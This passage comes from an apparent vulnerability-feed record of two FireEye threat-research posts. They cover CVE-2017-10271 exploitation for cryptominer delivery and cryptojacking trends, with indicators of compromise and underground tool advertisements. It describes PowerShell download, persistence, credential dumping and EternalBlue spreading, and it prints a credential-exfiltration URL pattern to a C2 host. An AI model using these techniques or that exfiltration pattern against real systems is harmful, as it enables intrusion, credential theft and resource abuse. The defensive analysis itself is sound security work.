WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.\n\nFireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments.\n\nWe saw evidence of organizations located in various countries \u2013 including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical \u2013 being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. This coupled with the diversity of organizations potentially affected by this activity suggests that the external targeting calculus of these attacks is indiscriminate in nature.\n\nThe recent cryptocurrency boom has resulted in a growing number of operations \u2013 employing diverse tactics \u2013 aimed at stealing cryptocurrencies. The idea that these cryptocurrency mining operations are less risky, along with the potentially nice profits, could lead cyber criminals to begin shifting away from ransomware campaigns.\n\n#### Tactic #1: Delivering the miner directly to a vulnerable server\n\nSome tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner directly onto the victim\u2019s system (Figure 1), and executing it using ShellExecute().\n\n \nFigure 1: Downloading the payload directly\n\n#### Tactic #2: Utilizing PowerShell scripts to deliver the miner\n\nOther tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly (Figure 2).\n\n \nFigure 2: Exploit delivering PowerShell script\n\nThis script has the following functionalities:\n\n * **Downloading miners from remote servers**\n\n \nFigure 3: Downloading cryptominers\n\nAs shown in Figure 3, the .ps1 script tries to download the payload from the remote server to a vulnerable server.\n\n * **Creating scheduled tasks for persistence**\n\n \nFigure 4: Creation of scheduled task\n\n * **Deleting scheduled tasks of other known cryptominers**\n\n \nFigure 5: Deletion of scheduled tasks related to other miners\n\nIn Figure 4, the cryptominer creates a scheduled task with name \u201c_Update service for Oracle products1_\u201d. In Figure 5, a different variant deletes this task and other similar tasks after creating its own, \u201c_Update service for Oracle productsa_\u201d. \n\nFrom this, it\u2019s quite clear that different attackers are fighting over the resources available in the system.\n\n * **Killing processes matching certain strings associated with other cryptominers**\n\n \nFigure 6: Terminating processes directly\n\n \nFigure 7: Terminating processes matching certain strings\n\nSimilar to scheduled tasks deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).\n\n * **Connects to mining pools with wallet key**\n\n \nFigure 8: Connection to mining pools\n\nThe miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for wallet key, -p for password of mining server, and -t for limiting the number of miner threads.\n\n * **Limiting CPU usage to avoid suspicion**\n\n \nFigure 9: Limiting CPU Usage\n\nTo avoid suspicion, some attackers are limiting the CPU usage of the miner (Figure 9).\n\n#### Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue\n\nSome tactics involve spreading laterally across a victim\u2019s environment using dumped Windows credentials and the [EternalBlue](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>) vulnerability ([CVE-2017-0144](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)).\n\nThe malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server. It looks at every network adapter, aggregating all destination IPs of established non-loopback network connections. Every IP address is then tested with extracted credentials and a credential-based execution of PowerShell is attempted that downloads and executes the malware from the C2 server on the target machine. This variant maintains persistence via WMI (Windows Management Instrumentation).\n\nThe malware also has the capability to perform a [Pass-the-Hash](<https://en.wikipedia.org/wiki/Pass_the_hash>) attack with the NTLM information derived from Mimikatz in order to download and execute the malware in remote systems.\n\nAdditionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to: 'http://&lt;C2&gt;:8000/api.php?data=&lt;credential data&gt;'.\n\nIf the lateral movement with credentials fails, then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue, and uses it to spread to that host.\n\nAfter all network derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to that host.\n\n#### Tactic #4: Scenarios observed in Linux OS\n\nWe\u2019ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality similar to the PowerShell scripts.\n\n \nFigure 10: Delivery of shell scripts\n\nThe shell script performs the following activities:\n\n * **Attempts to kill already running cryptominers**\n\n \nFigure 11: Terminating processes matching certain strings\n\n * **Downloads and executes cryptominer malware**\n\n \nFigure 12: Downloading CryptoMiner\n\n * **Creates a cron job to maintain persistence**\n\n \nFigure 13: Cron job for persistence\n\n * **Tries to kill other potential miners to hog the CPU usage**\n\n \nFigure 14: Terminating other potential miners\n\nThe function shown in Figure 14 is used to find processes that have high CPU usage and terminate them. This terminates other potential miners and maximizes the utilization of resources.\n\n#### Conclusion\n\nUse of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make money from victims. We\u2019ve observed one threat actor mining around 1 XMR/day, demonstrating the potential profitability and reason behind the recent rise in such attacks. Additionally, these operations may be perceived as less risky when compared to ransomware operations, since victims may not even know the activity is occurring beyond the slowdown in system performance.\n\nNotably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner so cyber criminals will maximize their outreach and profits.\n\nFireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner tries to connect to mining pools.\n\nAt the time of writing, FireEye HX detects this activity with the following indicators:\n\n**Detection Name** \n \n--- \n \nPOWERSHELL DOWNLOADER (METHODOLOGY) \n \nMONERO MINER (METHODOLOGY) \n \nMIMIKATZ (CREDENTIAL STEALER) \n \n#### Indicators of Compromise\n\n**MD5**\n\n| \n\n**Name** \n \n---|--- \n \n3421A769308D39D4E9C7E8CAECAF7FC4\n\n| \n\ncranberry.exe/logic.exe \n \nB3A831BFA590274902C77B6C7D4C31AE\n\n| \n\nxmrig.exe/yam.exe \n \n26404FEDE71F3F713175A3A3CEBC619B\n\n| \n\n1.ps1 \n \nD3D10FAA69A10AC754E3B7DDE9178C22\n\n| \n\n2.ps1 \n \n9C91B5CF6ECED54ABB82D1050C5893F2\n\n| \n\ninfo3.ps1 \n \n3AAD3FABF29F9DF65DCBD0F308FF0FA8\n\n| \n\ninfo6.ps1 \n \n933633F2ACFC5909C83F5C73B6FC97CC\n\n| \n\nlower.css \n \nB47DAF937897043745DF81F32B9D7565\n\n| \n\nlib.css \n \n3542AC729035C0F3DB186DDF2178B6A0\n\n| \n\nbootstrap.css \n \nThanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-15T11:30:00", "type": "fireeye", "title": "CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-10271"], "modified": "2018-02-15T11:30:00", "id": "FIREEYE:399092589F455855881447C60B56C21A", "href": "https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-11-04T00:24:38", "description": "#### Introduction\n\nCyber criminals tend to favor cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This [interest has increased in recent years](<https://www.fireeye.com/blog/threat-research/2018/04/cryptocurrencies-cyber-crime-blockchain-infrastructure-use.html>), stemming far beyond the desire to simply use cryptocurrencies as a method of payment for illicit tools and services. Many actors have also attempted to capitalize on the growing popularity of cryptocurrencies, and subsequent rising price, by conducting various operations aimed at them. These operations include malicious cryptocurrency mining (also referred to as cryptojacking), the collection of cryptocurrency wallet credentials, extortion activity, and the targeting of cryptocurrency exchanges.\n\nThis blog post discusses the various trends that we have been observing related to cryptojacking activity, including cryptojacking modules being added to popular malware families, an increase in drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, cryptojacking as a threat to critical infrastructure, and observed distribution mechanisms.\n\n#### What Is Mining?\n\nAs transactions occur on a blockchain, those transactions must be validated and propagated across the network. As computers connected to the blockchain network (aka nodes) validate and propagate the transactions across the network, the miners include those transactions into \"blocks\" so that they can be added onto the chain. Each block is cryptographically hashed, and must include the hash of the previous block, thus forming the \"chain\" in blockchain. In order for miners to compute the complex hashing of each valid block, they must use a machine's computational resources. The more blocks that are mined, the more resource-intensive solving the hash becomes. To overcome this, and accelerate the mining process, many miners will join collections of computers called \"pools\" that work together to calculate the block hashes. The more computational resources a pool harnesses, the greater the pool's chance of mining a new block. When a new block is mined, the pool's participants are rewarded with coins. Figure 1 illustrates the roles miners play in the blockchain network.\n\n \nFigure 1: The role of miners\n\n#### Underground Interest\n\nFireEye iSIGHT Intelligence has identified eCrime actor interest in cryptocurrency mining-related topics dating back to at least 2009 within underground communities. Keywords that yielded significant volumes include miner, cryptonight, stratum, xmrig, and cpuminer. While searches for certain keywords fail to provide context, the frequency of these cryptocurrency mining-related keywords shows a sharp increase in conversations beginning in 2017 (Figure 2). It is probable that at least a subset of actors prefer cryptojacking over other types of financially motivated operations due to the perception that it does not attract as much attention from law enforcement.\n\n \nFigure 2: Underground keyword mentions\n\n#### Monero Is King\n\nThe majority of recent cryptojacking operations have overwhelmingly focused on mining Monero, an open-source cryptocurrency based on the CryptoNote protocol, as a fork of Bytecoin. Unlike many cryptocurrencies, Monero uses a unique technology called \"ring signatures,\" which shuffles users' public keys to eliminate the possibility of identifying a particular user, ensuring it is untraceable. Monero also employs a protocol that generates multiple, unique single-use addresses that can only be associated with the payment recipient and are unfeasible to be revealed through blockchain analysis, ensuring that Monero transactions are unable to be linked while also being cryptographically secure.\n\nThe Monero blockchain also uses what's called a \"memory-hard\" hashing algorithm called CryptoNight and, unlike Bitcoin's SHA-256 algorithm, it deters application-specific integrated circuit (ASIC) chip mining. This feature is critical to the Monero developers and allows for CPU mining to remain feasible and profitable. Due to these inherent privacy-focused features and CPU-mining profitability, Monero has become an attractive option for cyber criminals.\n\n#### Underground Advertisements for Miners\n\nBecause most miner utilities are small, open-sourced tools, many criminals rely on crypters. Crypters are tools that employ encryption, obfuscation, and code manipulation techniques to keep their tools and malware fully undetectable (FUD). Table 1 highlights some of the most commonly repurposed Monero miner utilities.\n\n**XMR Mining Utilities** \n \n--- \n \nXMR-STACK \n \nMINERGATE \n \nXMRMINER \n \nCCMINER \n \nXMRIG \n \nCLAYMORE \n \nSGMINER \n \nCAST XMR \n \nLUKMINER \n \nCPUMINER-MULTI \n \nTable 1: Commonly used Monero miner utilities\n\nThe following are sample advertisements for miner utilities commonly observed in underground forums and markets. Advertisements typically range from stand-alone miner utilities to those bundled with other functions, such as credential harvesters, remote administration tool (RAT) behavior, USB spreaders, and distributed denial-of-service (DDoS) capabilities.\n\n##### Sample Advertisement #1 (Smart Miner + Builder)\n\nIn early April 2018, actor \"Mon\u00a3y\" was observed by FireEye iSIGHT Intelligence selling a Monero miner for $80 USD \u2013 payable via Bitcoin, Bitcoin Cash, Ether, Litecoin, or Monero \u2013 that included unlimited builds, free automatic updates, and 24/7 support. The tool, dubbed Monero Madness (Figure 3), featured a setting called Madness Mode that configures the miner to only run when the infected machine is idle for at least 60 seconds. This allows the miner to work at its full potential without running the risk of being identified by the user. According to the actor, Monero Madness also provides the following features:\n\n * Unlimited builds\n * Builder GUI (Figure 4)\n * Written in AutoIT (no dependencies)\n * FUD\n * Safer error handling\n * Uses most recent XMRig code\n * Customizable pool/port\n * Packed with UPX\n * Works on all Windows OS (32- and 64-bit)\n * Madness Mode option\n\n \nFigure 3: Monero Madness\n\n \nFigure 4: Monero Madness builder\n\n##### Sample Advertisement #2 (Miner + Telegram Bot Builder)\n\nIn March 2018, FireEye iSIGHT Intelligence observed actor \"kent9876\" advertising a Monero cryptocurrency miner called Goldig Miner (Figure 5). The actor requested payment of $23 USD for either CPU or GPU build or $50 USD for both. Payments could be made with Bitcoin, Ether, Litecoin, Dash, or PayPal. The miner ostensibly offers the following features:\n\n * Written in C/C++\n * Build size is small (about 100\u2013150 kB)\n * Hides miner process from popular task managers\n * Can run without Administrator privileges (user-mode)\n * Auto-update ability\n * All data encoded with 256-bit key\n * Access to Telegram bot-builder\n * Lifetime support (24/7) via Telegram\n\n \nFigure 5: Goldig Miner advertisement\n\n##### Sample Advertisement #3 (Miner + Credential Stealer)\n\nIn March 2018, FireEye iSIGHT Intelligence observed actor \"TH3FR3D\" offering a tool dubbed Felix (Figure 6) that combines a cryptocurrency miner and credential stealer. The actor requested payment of $50 USD payable via Bitcoin or Ether. According to the advertisement, the Felix tool boasted the following features:\n\n * Written in C# (Version 1.0.1.0)\n * Browser stealer for all major browsers (cookies, saved passwords, auto-fill)\n * Monero miner (uses minergate.com pool by default, but can be configured)\n * Filezilla stealer\n * Desktop file grabber (.txt and more)\n * Can download and execute files\n * Update ability\n * USB spreader functionality\n * PHP web panel\n\n \nFigure 6: Felix HTTP\n\n##### Sample Advertisement #4 (Miner + RAT)\n\nIn January 2018, FireEye iSIGHT Intelligence observed actor \"ups\" selling a miner for any Cryptonight-based cryptocurrency (e.g., Monero and Dashcoin) for either Linux or Windows operating systems. In addition to being a miner, the tool allegedly provides local privilege escalation through the [CVE-2016-0099](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-032>) exploit, can download and execute remote files, and receive commands. Buyers could purchase the Windows or Linux tool for \u20ac200 EUR, or \u20ac325 EUR for both the Linux and Windows builds, payable via Monero, bitcoin, ether, or dash. According to the actor, the tool offered the following:\n\n_Windows Build Specifics_\n\n * Written in C++ (no dependencies)\n * Miner component based on XMRig\n * Easy cryptor and VPS hosting options\n * Web panel (Figure 7)\n * Uses TLS for secured communication\n * Download and execute\n * Auto-update ability\n * Cleanup routine\n * Receive remote commands\n * Perform privilege escalation\n * Features \"game mode\" (mining stops if user plays game)\n * Proxy feature (based on XMRig)\n * Support (for \u20ac20/month)\n * Kills other miners from list\n * Hidden from TaskManager\n * Configurable pool, coin, and wallet (via panel)\n * Can mine the following Cryptonight-based coins:\n * Monero\n * Bytecoin\n * Electroneum\n * DigitalNote\n * Karbowanec\n * Sumokoin\n * Fantomcoin\n * Dinastycoin\n * Dashcoin\n * LeviarCoin\n * BipCoin\n * QuazarCoin\n * Bitcedi\n\n_Linux Build Specifics_\n\n * Issues running on Linux servers (higher performance on desktop OS)\n * Compatible with AMD64 processors on Ubuntu, Debian, Mint (support for CentOS later)\n\n \nFigure 7: Miner bot web panel\n\n##### Sample Advertisement #5 (Miner + USB Spreader + DDoS Tool)\n\nIn August 2017, actor \"MeatyBanana\" was observed by FireEye iSIGHT Intelligence selling a Monero miner utility that included the ability to download and execute files and perform DDoS attacks. The actor offered the software for $30 USD, payable via Bitcoin. Ostensibly, the tool works with CPUs only and offers the following features:\n\n * Configurable miner pool and port (default to minergate)\n * Compatible with both 64- and 86-bit Windows OS\n * Hides from the following popular task managers:\n * Windows Task Manager\n * Process Killer\n * KillProcess\n * System Explorer\n * Process Explorer\n * AnVir\n * Process Hacker\n * Masked as a system driver\n * Does not require administrator privileges\n * No dependencies\n * Registry persistence mechanism\n * Ability to perform \"tasks\" (download and execute files, navigate to a site, and perform DDoS)\n * USB spreader\n * Support after purchase\n\n#### The Cost of Cryptojacking\n\nThe presence of mining software on a network can generate costs on three fronts as the miner surreptitiously allocates resources:\n\n 1. Degradation in system performance\n 2. Increased cost in electricity\n 3. Potential exposure of security holes\n\nCryptojacking targets computer processing power, which can lead to high CPU load and degraded performance. In extreme cases, CPU overload may even cause the operating system to crash. Infected machines may also attempt to infect neighboring machines and therefore generate large amounts of traffic that can overload victims' computer networks.\n\nIn the case of operational technology (OT) networks, the consequences could be severe. Supervisory control and data acquisition/industrial control systems (SCADA/ICS) environments predominately rely on decades-old hardware and low-bandwidth networks, therefore even a slight increase in CPU load or the network could leave industrial infrastructures unresponsive, impeding operators from interacting with the controlled process in real-time.\n\nThe electricity cost, measured in kilowatt hour (kWh), is dependent upon several factors: how often the malicious miner software is configured to run, how many threads it's configured to use while running, and the number of machines mining on the victim's network. The cost per kWh is also highly variable and depends on geolocation. For example, security researchers who ran Coinhive on a machine for 24 hours found that the electrical consumption was 1.212kWh. They estimated that this equated to electrical costs per month of $10.50 USD in the United States, $5.45 USD in Singapore, and $12.30 USD in Germany.\n\nCryptojacking can also highlight often overlooked security holes in a company's network. Organizations infected with cryptomining malware are also likely vulnerable to more severe exploits and attacks, ranging from ransomware to ICS-specific malware such as [TRITON](<https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-triton-and-tristation.html>).\n\n#### Cryptocurrency Miner Distribution Techniques\n\nIn order to maximize profits, cyber criminals widely disseminate their miners using various techniques such as incorporating cryptojacking modules into existing botnets, drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, and distributing cryptojacking utilities via spam and self-propagating utilities. Threat actors can use cryptojacking to affect numerous devices and secretly siphon their computing power. Some of the most commonly observed devices targeted by these cryptojacking schemes are:\n\n * User endpoint machines\n * Enterprise servers\n * Websites\n * Mobile devices\n * Industrial control systems\n\n##### Cryptojacking in the Cloud\n\nPrivate sector companies and governments alike are increasingly [moving their data and applications to the cloud](<https://www.fireeye.com/blog/executive-perspective/2018/04/anatomy-of-a-public-cloud-compromise.html>), and cyber threat groups have been moving with them. Recently, there have been various reports of actors conducting cryptocurrency mining operations specifically targeting cloud infrastructure. Cloud infrastructure is increasingly a target for cryptojacking operations because it offers actors an attack surface with large amounts of processing power in an environment where CPU usage and electricity costs are already expected to be high, thus allowing their operations to potentially go unnoticed. We assess with high confidence that threat actors will continue to target enterprise cloud networks in efforts to harness their collective computational resources for the foreseeable future.\n\nThe following are some real-world examples of cryptojacking in the cloud:\n\n * In February 2018, FireEye researchers published a blog detailing various techniques actors used in order to deliver malicious miner payloads (specifically to vulnerable Oracle servers) by abusing CVE-2017-10271. Refer to our blog post for more detailed information regarding the [post-exploitation and pre-mining dissemination techniques](<https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html>) used in those campaigns.\n * In March 2018, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/coinminer-campaigns-move-to-the-cloud-via-docker-kubernetes/>) on the trend of cryptocurrency mining campaigns moving to the cloud via vulnerable Docker and Kubernetes applications, which are two software tools used by developers to help scale a company's cloud infrastructure. In most cases, successful attacks occur due to misconfigured applications and/or weak security controls and passwords.\n * In February 2018, [Bleeping Computer also reported](<https://www.bleepingcomputer.com/news/security/tesla-internal-servers-infected-with-cryptocurrency-miner/>) on hackers who breached Tesla's cloud servers to mine Monero. Attackers identified a Kubernetes console that was not password protected, allowing them to discover login credentials for the broader Tesla Amazon Web services (AWS) S3 cloud environment. Once the attackers gained access to the AWS environment via the harvested credentials, they effectively launched their cryptojacking operations.\n * Reports of cryptojacking activity due to misconfigured AWS S3 cloud storage buckets have also been observed, as was the case in the [LA Times online compromise](<https://www.theregister.co.uk/2018/02/22/la_times_amazon_aws_s3/>) in February 2018. The presence of vulnerable AWS S3 buckets allows anyone on the internet to access and change hosted content, including the ability to inject mining scripts or other malicious software.\n\n##### Incorporation of Cryptojacking into Existing Botnets\n\nFireEye iSIGHT Intelligence has observed multiple prominent botnets such as Dridex and Trickbot incorporate cryptocurrency mining into their existing operations. Many of these families are modular in nature and have the ability to download and execute remote files, thus allowing the operators to easily turn their infections into cryptojacking bots. While these operations have traditionally been aimed at credential theft (particularly of banking credentials), adding mining modules or downloading secondary mining payloads provides the operators another avenue to generate additional revenue with little effort. This is especially true in cases where the victims were deemed unprofitable or have already been exploited in the original scheme.\n\nThe following are some real-world examples of cryptojacking being incorporated into existing botnets:\n\n * In early February 2018, FireEye iSIGHT Intelligence observed Dridex botnet ID 2040 download a Monero cryptocurrency miner based on the open-source XMRig miner.\n * On Feb. 12, 2018, FireEye iSIGHT Intelligence observed the banking malware IcedID injecting Monero-mining JavaScript into webpages for specific, targeted URLs. The IcedID injects launched an anonymous miner using the mining code from Coinhive's AuthedMine.\n * In late 2017, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/codefork-group-uses-fileless-malware-to-deploy-monero-miners/>) that security researchers with Radware observed the hacking group CodeFork leveraging the popular downloader Andromeda (aka Gamarue) to distribute a miner module to their existing botnets.\n * In late 2017, FireEye researchers observed Trickbot operators deploy a new module named \"testWormDLL\" that is a statically compiled copy of the popular XMRig Monero miner.\n * On Aug. 29, 2017, [Security Week reported](<https://www.securityweek.com/jimmy-banking-trojan-reuses-nukebot-code>) on a variant of the popular Neutrino banking Trojan, including a Monero miner module. According to their reporting, the new variant no longer aims at stealing bank card data, but instead is limited to downloading and executing modules from a remote server.\n\n#### Drive-By Cryptojacking\n\n##### In-Browser\n\nFireEye iSIGHT Intelligence has examined various customer reports of browser-based cryptocurrency mining. Browser-based mining scripts have been observed on compromised websites, third-party advertising platforms, and have been legitimately placed on websites by publishers. While coin mining scripts can be embedded directly into a webpage's source code, they are frequently loaded from third-party websites. Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers, such as in the case of a compromised website. Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors. At the time of reporting, the most popular script being deployed in the wild is Coinhive. Coinhive is an open-source JavaScript library that, when loaded on a vulnerable website, can mine Monero using the site visitor's CPU resources, unbeknownst to the user, as they browse the site.\n\nThe following are some real-world examples of Coinhive being deployed in the wild:\n\n * In September 2017, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/chrome-extension-embeds-in-browser-monero-miner-that-drains-your-cpu/>) that the authors of SafeBrowse, a Chrome extension with more than 140,000 users, had embedded the Coinhive script in the extension's code that allowed for the mining of Monero using users' computers and without getting their consent.\n * During mid-September 2017, [users on Reddit](<https://www.reddit.com/r/thepiratebay/comments/70aip7/100_cpu_on_all_8_threads_while_visiting_tpb/?sort=new>) began complaining about increased CPU usage when they navigated to a popular torrent site, The Pirate Bay (TPB). The spike in CPU usage was a result of Coinhive's script being embedded within the site's footer. According to TPB operators, it was implemented as a test to generate passive revenue for the site (Figure 8).\n * In December 2017, researchers with [Sucuri reported](<https://blog.sucuri.net/2017/12/malicious-cryptominers-from-github.html>) on the presence of the Coinhive script being hosted on GitHub.io, which allows users to publish web pages directly from GitHub repositories.\n * Other reporting disclosed the Coinhive script being embedded on the [Showtime domain](<https://www.bleepingcomputer.com/news/security/showtime-websites-used-to-mine-monero-unclear-if-hack-or-an-experiment/>) as well as on the [LA Times website](<https://www.itwire.com/security/81860-la-times-serving-cryptocurrency-mining-script.html>), both surreptitiously mining Monero.\n * A majority of in-browser cryptojacking activity is transitory in nature and will last only as long as the user\u2019s web browser is open. However, [researchers with Malwarebytes Labs](<https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomining-coming-to-a-browser-near-you/>) uncovered a technique that allows for continued mining activity even after the browser window is closed. The technique leverages a pop-under window surreptitiously hidden under the taskbar. As researchers pointed out, closing the browser window may not be enough to interrupt the activity, and that more advanced actions like running the Task Manager may be required.\n\n \nFigure 8: Statement from TPB operators on Coinhive script\n\n##### Malvertising and Exploit Kits\n\nMalvertisements \u2013 malicious ads on legitimate websites \u2013 commonly redirect visitors of a site to an exploit kit landing page. These landing pages are designed to scan a system for vulnerabilities, exploit those vulnerabilities, and download and execute malicious code onto the system. Notably, the malicious advertisements can be placed on legitimate sites and visitors can become infected with little to no user interaction. This distribution tactic is commonly used by threat actors to widely distribute malware and has been employed in various cryptocurrency mining operations.\n\nThe following are some real-world examples of this activity:\n\n * In early 2018, [researchers with Trend Micro reported](<https://www.bleepingcomputer.com/news/security/coinhive-cryptojacker-deployed-on-youtube-via-google-ads/>) that a modified miner script was being disseminated across YouTube via Google's DoubleClick ad delivery platform. The script was configured to generate a random number variable between 1 and 100, and when the variable was above 10 it would launch the Coinhive script _coinhive.min.js_, which harnessed 80 percent of the CPU power to mine Monero. When the variable was below 10 it launched a modified Coinhive script that was also configured to harness 80 percent CPU power to mine Monero. This custom miner connected to the mining pool wss[:]//ws[.]l33tsite[.]info:8443, which was likely done to avoid Coinhive's fees.\n * In April 2018, researchers with [Trend Micro](<https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-web-miner-script-injected-into-aol-advertising-platform/>) also discovered a JavaScript code based on Coinhive injected into an AOL ad platform. The miner used the following private mining pools: wss[:]//wsX[.]www.datasecu[.]download/proxy and wss[:]//www[.]jqcdn[.]download:8893/proxy. Examination of other sites compromised by this campaign showed that in at least some cases the operators were hosting malicious content on unsecured AWS S3 buckets.\n * Since July 16, 2017, [FireEye has observed](<https://www.fireeye.com/blog/threat-research/2017/08/neptune-exploit-kit-malvertising.html>) the Neptune Exploit Kit redirect to ads for hiking clubs and MP3 converter domains. Payloads associated with the latter include Monero CPU miners that are surreptitiously installed on victims' computers.\n * In January 2018, [Check Point researchers](<https://research.checkpoint.com/new-rig-exploit-kit-campaign-dropping-xmrig-miner/>) discovered a malvertising campaign leading to the Rig Exploit Kit, which served the XMRig Monero miner utility to unsuspecting victims.\n\n#### Mobile Cryptojacking\n\nIn addition to targeting enterprise servers and user machines, threat actors have also targeted mobile devices for cryptojacking operations. While this technique is less common, likely due to the limited processing power afforded by mobile devices, cryptojacking on mobile devices remains a threat as sustained power consumption can damage the device and dramatically shorten the battery life. Threat actors have been observed targeting mobile devices by hosting malicious cryptojacking apps on popular app stores and through drive-by malvertising campaigns that identify users of mobile browsers.\n\nThe following are some real-world examples of mobile devices being used for cryptojacking:\n\n * During 2014, FireEye iSIGHT Intelligence reported on multiple Android malware apps capable of mining cryptocurrency:\n * In March 2014, Android malware named \"CoinKrypt\" was discovered, which mined Litecoin, Dogecoin, and CasinoCoin currencies.\n * In March 2014, another form of Android malware \u2013 \"Android.Trojan.MuchSad.A\" or \"ANDROIDOS_KAGECOIN.HBT\" \u2013 was observed mining Bitcoin, Litecoin, and Dogecoin currencies. The malware was disguised as copies of popular applications, including \"Football Manager Handheld\" and \"TuneIn Radio.\" Variants of this malware have reportedly been downloaded by millions of Google Play users.\n * In April 2014, Android malware named \"BadLepricon,\" which mined Bitcoin, was identified. The malware was reportedly being bundled into wallpaper applications hosted on the Google Play store, at least several of which received 100 to 500 installations before being removed.\n * In October 2014, a type of mobile malware called \"Android Slave\" was observed in China; the malware was reportedly capable of mining multiple virtual currencies.\n * In December 2017, [researchers with Kaspersky Labs reported](<https://securelist.com/jack-of-all-trades/83470/>) on a new multi-faceted Android malware capable of a variety of actions including mining cryptocurrencies and launching DDoS attacks. The resource load created by the malware has reportedly been high enough that it can cause the battery to bulge and physically destroy the device. The malware, dubbed Loapi, is unique in the breadth of its potential actions. It has a modular framework that includes modules for malicious advertising, texting, web crawling, Monero mining, and other activities. Loapi is thought to be the work of the same developers behind the 2015 Android malware Podec, and is usually disguised as an anti-virus app.\n * In January 2018, [SophosLabs released a report](<https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-coinminer-and-other-malicious-cryptominers-tpna.pdf?la=en>) detailing their discovery of 19 mobile apps hosted on Google Play that contained embedded Coinhive-based cryptojacking code, some of which were downloaded anywhere from 100,000 to 500,000 times.\n * Between November 2017 and January 2018, [researchers with Malwarebytes Labs reported](<https://blog.malwarebytes.com/threat-analysis/2018/02/drive-by-cryptomining-campaign-attracts-millions-of-android-users/>) on a drive-by cryptojacking campaign that affected millions of Android mobile browsers to mine Monero.\n\n#### Cryptojacking Spam Campaigns\n\nFireEye iSIGHT Intelligence has observed several cryptocurrency miners distributed via spam campaigns, which is a commonly used tactic to indiscriminately distribute malware. We expect malicious actors will continue to use this method to disseminate cryptojacking code as for long as cryptocurrency mining remains profitable.\n\nIn late November 2017, FireEye researchers identified a spam campaign delivering a malicious PDF attachment designed to appear as a legitimate invoice from the largest port and container service in New Zealand: Lyttelton Port of Chistchurch (Figure 9). Once opened, the PDF would launch a PowerShell script that downloaded a Monero miner from a remote host. The malicious miner connected to the pools supportxmr.com and nanopool.org.\n\n \nFigure 9: Sample lure attachment (PDF) that downloads malicious cryptocurrency miner\n\nAdditionally, a massive cryptojacking spam campaign was discovered by FireEye researchers during January 2018 that was designed to look like legitimate financial services-related emails. The spam email directed victims to an infection link that ultimately dropped a malicious ZIP file onto the victim's machine. Contained within the ZIP file was a cryptocurrency miner utility (MD5: 80b8a2d705d5b21718a6e6efe531d493) configured to mine Monero and connect to the minergate.com pool. While each of the spam email lures and associated ZIP filenames were different, the same cryptocurrency miner sample was dropped across all observed instances (Table 2).\n\n**ZIP Filenames** \n 